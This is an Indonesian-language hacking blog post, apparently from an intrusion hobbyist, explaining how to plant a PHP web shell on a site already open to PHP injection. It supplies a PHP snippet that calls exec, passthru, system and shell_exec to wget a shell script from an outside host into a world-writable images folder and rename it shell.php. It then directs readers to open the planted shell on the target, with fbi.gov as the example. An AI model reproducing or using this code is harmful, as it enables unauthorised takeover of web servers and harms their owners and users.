Live Journal

All About Log

PHP inject Problem

Hm… selamat datang pagi (eh.. siang.. ma’af seperti biasa gw bangun telat lagi hari ini) yang cerah…!!

Sebelum wanita² itu datang menjemput gw kesini.. gw sempat²in buat posting artikel ini. ntar kalo keburu datang gw pending dolo yah..

Okeh..!!! masalah ini mungkin sering sekali kalian hadapin. terutama kamu, kamu, kamu, kamu, kamu dan kamu (semua yang ngerasa aja) yang selalu menyambut kehadiran saya dengan seratus pertanyaan yang mendasar. langsung saja.. masalah ini sering kali di temukan oleh teman² gw yang suka meninggalkan begitu saja target hacking (tepat nya cracking) mereka begitu saja kalo udah ga bisa di apa²in.

Hai.. Jek.. itu kan menurut lo ga bisa di apa²in…!!

Loh.. emang bisa Bos..?

Bisa donk….!!! apa seh yang ga bisa…!!! (maha benar iDiots dengan segala petunjuknya…!!). disini lah sebenarnya letak seni melakukan hacking (tepatnya cracking) terhadap suatu target. mengexploitasi suatu target itu akan lebih memuaskan kalo kita dapat kesulitan waktu melakukan penetrasi dan berhasil mengatasi kesulitan tersebut. seandainya kalian semua cuma melakukan penetrasi terhadap serper yang emang gampang sekali di kerjain mah ga ada seninya. anak kecil yang masih SD (Sekolah Dasar) juga bisa ngerjain semuanya…!! kalo tinggal copy paste command dan folder, upload file kesayangan (psybnc, bnc, eggdrop/bot) tros ngejalaninya…!!

setelah lama ga melakukan rutinitas biasa.. 2 hari yang lewat (hari yang cerah untuk memulai kehidupan baru) gw bangun tidor di sambut pertannyaan seputar php inject yang kalo kita execud perintah melalui script inject page akan berubah tampilan error.

gampang aja…!!! kita anggap saja di derectori situs tersebut terdapat folder images yang permisionnya 777. lo ganti aja.. script inject lo sama script execud yang isinya seperti ini…!!!

<?php
echo exec('cd images/;wget http://idiots.inf/phpshellscript.txt;mv phpshellscript.txt shell.php;');
echo passthru('cd images/;wget wget http://idiots.inf/phpshellscript.txt;mv phpshellscript.txt shell.php;');
echo system('cd images/;wget wget http://idiots.inf/phpshellscript.txt;mv phpshellscript.txt shell.php;');
echo shell_exec('cd images/;wget wget http://idiots.inf/phpshellscript.txt;mv phpshellscript.txt shell.php;');
?>

lalu lo coba buka alamat situs target lo..
contoh: http://fbi.gov/images/shell.php

Eng... ieng...!!! Jrenk..!!! maka tampilah.... phpshel lo di situs target...!!
n selanjutnya terserah anda he..he..he..

okeh.. selamat mencoba n berdjoang..!!

salam

iDiots

One response to “PHP inject Problem

  1. Pingback: Bydb » PHP Inject Problem

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: